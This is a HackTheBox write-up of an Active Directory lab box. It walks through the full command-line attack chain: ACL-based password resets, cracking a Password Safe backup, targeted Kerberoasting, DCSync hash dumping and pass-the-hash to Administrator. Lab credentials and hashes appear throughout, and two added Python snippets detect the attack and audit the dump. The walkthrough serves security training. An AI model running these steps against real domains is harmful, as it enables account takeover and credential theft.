
Administrator - HackTheBox


Administrator - FullPowers!

Administrator is the 2nd box on HackTheBox, and it presents an assumed-breach scenario. I’m given credentials for a low-privileged user, olivia, which I’ll use to enumerate ACLs. I’ll discover that olivia has GenericAll over another user, michael; michael has ForceChangePassword over another user, benjamin, who has access to FTP. After resetting the passwords, I’ll log in to FTP, download the Backup.psafe3 file, crack its master password and recover several credentials, of which only the emily user’s password is valid. I could use WinRM at this point to grab user.txt, but instead I’ll perform the next two steps to get Administrator. emily has GenericWrite over ethan, so I’ll perform targeted Kerberoasting to get his hash and crack it. ethan has DCSync rights, which I’ll abuse to get the Administrator’s hash.

Recon

Nmap

I’ll start off with nmap.

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-24 13:04:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

The only interesting open port is FTP, which I don’t have credentials for yet; I’ll come back to it later.

Auth and Enum as Olivia

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

I’ll first generate the hosts file entries with nxc and then collect BloodHound data with bloodhound-ce-python.

➜  Administrator nxc smb 10.129.254.20 --generate-hosts-file hosts
SMB         10.129.254.20   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False) (Null Auth:True)
➜  Administrator cat hosts| sudo tee -a /etc/hosts
10.129.254.20     DC.administrator.htb administrator.htb DC
➜  Administrator U=Olivia
➜  Administrator P=ichliebedich
➜  Administrator DOMAIN=administrator.htb
➜  Administrator IP=10.129.254.20
➜  Administrator sudo ntpdate 10.129.254.20
➜  Administrator bloodhound-ce-python  -u $U  -p $P -c All -d $DOMAIN --nameserver $IP --zip

FTP as Benjamin

I’ll mark olivia as owned; clicking Shortest Paths from Owned Objects in BloodHound shows a clear path to the user benjamin.

I’ll first change michael’s password, then use michael’s new password to reset benjamin’s. benjamin is a member of Share Moderators, which hints that he can access FTP.

Pass reset (net rpc)

michael:

$ net rpc password "michael" "newP@ssword2024" -U "administrator"/"olivia"%"ichliebedich" -S "DC.administrator.htb"

benjamin:

$ net rpc password "benjamin" "newP@ssword2025" -U "administrator"/"michael"%"newP@ssword2024" -S "DC.administrator.htb"

Pass reset (bloodyAD)

michael:

➜  Administrator bloodyAD --host "10.129.254.20" -d "administrator.htb" -u "olivia" -p "ichliebedich" set password "michael" "Password@123"
[+] Password changed successfully!

benjamin:

➜  Administrator bloodyAD --host "10.129.254.20" -d "Administrator.htb" -u "michael" -p "Password@123" set password "benjamin" "Password@123"
[+] Password changed successfully!

Now I can access FTP.

Auth / Shell as Emily

backup.psafe3

Looking through FTP, there is a .psafe3 backup file, which I’ll download.

➜  Administrator ftp [email protected]
Connected to DC.administrator.htb.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||58681|)
125 Data connection already open; Transfer starting.
10-05-24  09:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||58682|)
125 Data connection already open; Transfer starting.
100% |*********************************************************************************************************************************************************************************************|   952        8.51 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (8.43 KiB/s)
ftp>

.psafe3 is the database format of Password Safe (sudo apt install passwordsafe).

➜  Administrator file Backup.psafe3
Backup.psafe3: Password Safe V3 database

I can extract a hash with pwsafe2john and crack it with john.

➜  Administrator pwsafe2john Backup.psafe3 > backup.hash
➜  Administrator john backup.hash -w=/usr/share/wordlists/rockyou.txt --fork=4
<SNIP>
tekieromucho     (Backu)
<SNIP>

I’ll open the backup with pwsafe and export the passwords into plain text rather than copying each password manually.

➜  Administrator pwsafe Backup.psafe3
<Prompt for the password, I'll enter the pass and hit enter>

There are some passwords in this backup.

I’ll export them to plain text: File > Export To > Plain Text (...), enter the password, click OK, and save the file in the box’s directory.

➜  Administrator awk -F'\t' 'NR>1 {print $2, $3}' plain.txt
alexander UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma WwANQWnmJnGV07WQN8bMS7FMAbjNur

Only emily’s password is valid, which I can verify quickly with nxc.

➜  Administrator nxc smb 10.129.254.20 -u users.txt -p pass.txt | grep -i "[+]"
SMB                      10.129.254.20   445    DC               [+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Shell as Administrator

I’ll mark emily as owned and click Shortest Paths from Owned Objects again. Looking at emily’s outbound object control, emily has GenericWrite over ethan, who has DCSync rights.

I could change ethan’s password, but instead I’ll do targeted Kerberoasting using targetedKerberoast.py from ShutDown.

➜  Administrator pythonx /opt/targetedKerberoast/targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip 10.129.254.20
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f1f81fde248e1a392d6e85ceb3389b50$eeb07f189c7edd28bfd9d1f3bed68fb68f3223192894eca90e05632e40fb959df631c1a6d599c73c7a6335e9f2b4a24ebc9e8037b182797a979dc3fbc4a10a1cda48cbb9a73bdc5dd<SNIP>
[VERBOSE] SPN removed successfully for (ethan)

I’ll crack the hash with rockyou; john cracks it almost instantly.

➜  Administrator john ethan.hash -w=/usr/share/wordlists/rockyou.txt
<SNIP>
limpbizkit       (?)
<SNIP>
Session completed.
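From the defender’s side, the SPN write, the RC4 service-ticket request and the SPN removal shown above leave a distinctive trail in the domain controller’s Security log. The following Python detection is an added example (not part of this writeup or of the targetedKerberoast project); it assumes events already parsed into dicts using the standard 5136 (directory object modified) and 4769 (TGS requested) field names, and runs over constructed sample events modelled on the attack above.

```python
from datetime import datetime, timedelta

# Constructed sample events (assumption: field names follow the Windows Security
# log schema for 5136 "directory object modified" and 4769 "TGS requested").
EVENTS = [
    {"time": "2025-09-24T13:05:01", "id": 5136, "SubjectUserName": "emily",
     "ObjectDN": "CN=Ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "%%14674"},
    {"time": "2025-09-24T13:05:02", "id": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17"},
    {"time": "2025-09-24T13:05:03", "id": 5136, "SubjectUserName": "emily",
     "ObjectDN": "CN=Ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "%%14675"},
    # benign: AES ticket for a long-standing service account (constructed name)
    {"time": "2025-09-24T13:06:00", "id": 4769, "TargetUserName": "olivia@ADMINISTRATOR.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"},
]

VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"   # 5136 OperationType codes

def cn_from_dn(dn):
    """'CN=Ethan,CN=Users,...' -> 'ethan'."""
    return dn.split(",")[0].split("=", 1)[1].lower()

def detect_targeted_kerberoast(events, window=timedelta(minutes=10)):
    """Alert on RC4 (0x17) TGS requests for accounts whose SPN was written moments
    earlier, and on SPN add/remove pairs inside the window (the targetedKerberoast pattern)."""
    spn_added = {}   # account -> (when the SPN was added, by whom)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5136 and ev["AttributeLDAPDisplayName"] == "servicePrincipalName":
            acct = cn_from_dn(ev["ObjectDN"])
            if ev["OperationType"] == VALUE_ADDED:
                spn_added[acct] = (t, ev["SubjectUserName"])
            elif ev["OperationType"] == VALUE_DELETED and acct in spn_added:
                added_at, who = spn_added[acct]
                if t - added_at <= window:
                    alerts.append({"kind": "spn_add_remove", "account": acct, "by": who})
        elif ev["id"] == 4769 and ev["TicketEncryptionType"] == "0x17":
            acct = ev["ServiceName"].lower()
            if acct in spn_added and t - spn_added[acct][0] <= window:
                alerts.append({"kind": "rc4_tgs_after_spn_write", "account": acct,
                               "by": ev["TargetUserName"]})
    return alerts
```

Auditing of servicePrincipalName changes must be enabled on user objects for 5136 to be logged at all; without it only the RC4 4769 remains, which is the weaker, Kerberoast-style signal.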

DCSync

With ethan’s password I’ll perform DCSync using nxc: adding the --ntds flag does the job, rather than typing out the full secretsdump.py command.

➜  Administrator nxc smb 10.129.254.20 -u ethan -p limpbizkit --ntds
<SNIP>
SMB         10.129.254.20   445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.129.254.20   445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
SMB         10.129.254.20   445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.254.20   445    DC               krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
SMB         10.129.254.20   445    DC               administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
SMB         10.129.254.20   445    DC               administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
SMB         10.129.254.20   445    DC               administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
SMB         10.129.254.20   445    DC               administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
SMB         10.129.254.20   445    DC               administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
SMB         10.129.254.20   445    DC               administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
SMB         10.129.254.20   445    DC               administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
SMB         10.129.254.20   445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
<SNIP>
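The dump above also shows why defenders audit NTDS extracts: michael and benjamin share an NT hash because both were reset to the same password earlier in the writeup. This added Python example (not part of the writeup or of nxc) parses the nxc --ntds / secretsdump line format and reports hash reuse, empty passwords and stored LM hashes; its input is a constructed sample built from lines of the output above.

```python
import re
from collections import defaultdict

# Constructed sample: a few lines in the nxc --ntds / secretsdump format
# (user:rid:lmhash:nthash:::), taken from the dump shown above.
SAMPLE_DUMP = r"""
SMB         10.129.254.20   445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.129.254.20   445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
SMB         10.129.254.20   445    DC               Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.254.20   445    DC               administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
SMB         10.129.254.20   445    DC               administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
SMB         10.129.254.20   445    DC               administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
SMB         10.129.254.20   445    DC               DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
"""

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty / not-stored LM password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

LINE_RE = re.compile(
    r"(?P<user>[^\s:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::\s*$"
)

def parse_dump(text):
    """Yield (user, rid, lm, nt) for every hash line, ignoring nxc's status prefix."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            yield m["user"], int(m["rid"]), m["lm"], m["nt"]

def audit_dump(text):
    """Flag password reuse, empty passwords and stored LM hashes in an NTDS dump."""
    by_nt = defaultdict(list)
    report = {"reused": {}, "empty_password": [], "lm_stored": []}
    for user, rid, lm, nt in parse_dump(text):
        by_nt[nt].append(user)
        if nt == EMPTY_NT:
            report["empty_password"].append(user)
        if lm != EMPTY_LM:
            report["lm_stored"].append(user)
    report["reused"] = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return report
```

Guest shows up under empty_password because its NT hash is that of the empty string; on a real domain that account should also be disabled, which the dump alone does not tell you.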

root.txt & user.txt

I can grab root.txt and user.txt via nxc, passing the Administrator NT hash, rather than using evil-winrm.

➜  Administrator nxc winrm 10.129.254.20 -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e -X "type C:\Users\*\Desktop\*.txt"
WINRM       10.129.254.20   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.254.20   5985   DC               [+] administrator.htb\Administrator:3dc553ce4b9fd20bd016e098d2d2fd2e (Pwn3d!)
WINRM       10.129.254.20   5985   DC               [+] Executed command (shell type: powershell)
WINRM       10.129.254.20   5985   DC               69884273ddb26c729c042e9c0d955104
WINRM       10.129.254.20   5985   DC               9a80efaffacad50b731e7282be0431e8

Thanks for reading the writeup.

PEPE

This post is licensed under CC BY 4.0 by the author.